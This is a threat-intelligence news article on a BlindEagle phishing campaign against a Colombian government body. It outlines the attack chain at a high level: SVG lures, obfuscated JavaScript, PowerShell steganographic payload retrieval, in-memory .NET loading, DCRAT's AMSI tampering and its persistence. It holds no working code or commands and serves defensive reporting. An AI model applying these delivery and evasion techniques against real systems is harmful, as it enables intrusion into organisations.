“`html
BlindEagle, a South American threat faction, has initiated a sophisticated operation targeting Colombian governmental bodies, showcasing a concerning advancement in attack strategies.
In the beginning of September 2025, the faction aimed at a governmental entity linked to the Ministry of Commerce, Industry, and Tourism (MCIT) through synchronized phishing emails and multi-layered malware dispersal.
This assault signifies a considerable escalation in the intricacy and sophistication of BlindEagle’s activities, transcending simple malware installation to a meticulously coordinated sequence involving multiple malicious elements.
The offense commences with a tactically designed phishing email masquerading as the Colombian judicial system.
The message employs legal jargon and official governmental design to instill a sense of urgency, compelling recipients to verify receipt of what seems to be a labor lawsuit notification.
Notably, the phishing correspondence was dispatched from a compromised account within the same agency, providing credibility to the communication and evading standard email security protocols.
This internal breach permitted the aggressors to leverage trust connections and sidestep identification by security measures typically attuned to outside threats.
Zscaler specialists uncovered the entire attack framework and concluded that BlindEagle utilized an unusually intricate file-less strategy to evade detection systems.
.webp)
The initial attachment is an SVG (Scalable Vector Graphics) image embedded with encoded HTML leading users to a deceptive web portal resembling the authentic Colombian judicial branch.
Once a user engages with this portal, the attack progression unfolds through three JavaScript files and a PowerShell command, with each stage progressively deobfuscating the ensuing component through various encoding methodologies, including Base64 and custom obfuscation techniques.
Infection method
The infection method exhibits notable sophistication by utilizing steganography and legitimate services for payload delivery.
JavaScript files within the attack chain apply complex deobfuscation routines where integer arrays are transformed into executable code.
The PowerShell command retrieves an image file from the Internet Archive, extracts a Base64-encoded malicious payload concealed within, and loads the payload directly into memory utilizing .NET reflection.
.webp)
This in-memory execution circumvents any malicious file from touching the disk, considerably complicating detection initiatives for traditional file-based security solutions.
The PowerShell script executes Caminho, a downloader malware featuring Portuguese language artifacts in its code, which subsequently acquires DCRAT via Discord’s content delivery network.
DCRAT presents advanced evasion functionalities, prominently altering Microsoft’s Antimalware Scan Interface (AMSI) to disable detection systems.
.webp)
The malware establishes persistence via scheduled tasks and registry alterations, granting aggressors sustained access to compromised systems.
This operation illustrates BlindEagle’s evolution as a threat actor, merging social engineering skills with technical adeptness in obfuscation, steganography, and legitimate service misuse to conduct targeted assaults on governmental infrastructure with diminished detection risk.
“`